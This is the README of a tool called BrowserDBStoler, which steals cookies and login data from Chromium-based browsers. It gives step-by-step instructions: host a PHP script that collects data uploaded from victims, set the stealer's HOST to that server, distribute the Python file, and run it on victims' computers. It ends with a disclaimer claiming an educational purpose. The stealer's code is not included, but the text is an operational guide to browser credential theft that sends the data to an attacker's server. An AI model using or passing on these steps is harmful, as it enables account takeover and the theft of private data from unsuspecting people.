Steal cookies and login data from Chromium based browser.
https://dev.crizacio.com/docs/BrowserDBStoler
Sorry for the bad english, i'm trying to keep the more understable-like mode.
-
First, get a PHP compatible server. Like shared-hosting.
-
Create a folder, and inside it upload:
-cookies.php
: Server-Side script to upload collected data from victims.needs a folder called
cookies
where the script is.-
browserdbstoler.py
: Main script that will be downloaded by the victim. -
Modify some lines in the
bdbs.py
file.
HOST = "https://example/BDBS/"
where the root folder with the script is, relative to http path.
-
Distribute the
bdbs.py
file. -
Run the previous script file in the victim's computer.
-
Enjoy.
The FTP www directory must look something like:
- BDBS
- cookies/
- browserdbstoler.py
- cookies.php
And you need to be able to see cookies.php
from a webbroser. Like https://example/BDBS/cookies.php
.
And, you need to be able to download browserdbstoler.py
from a webbrowser too. Like https://example/BDBS/browserdbstoler.py
.
I am not responsible for any misuse that may be given to the script. This was designed for educational purposes for an evaluation for the Cybersecurity subject.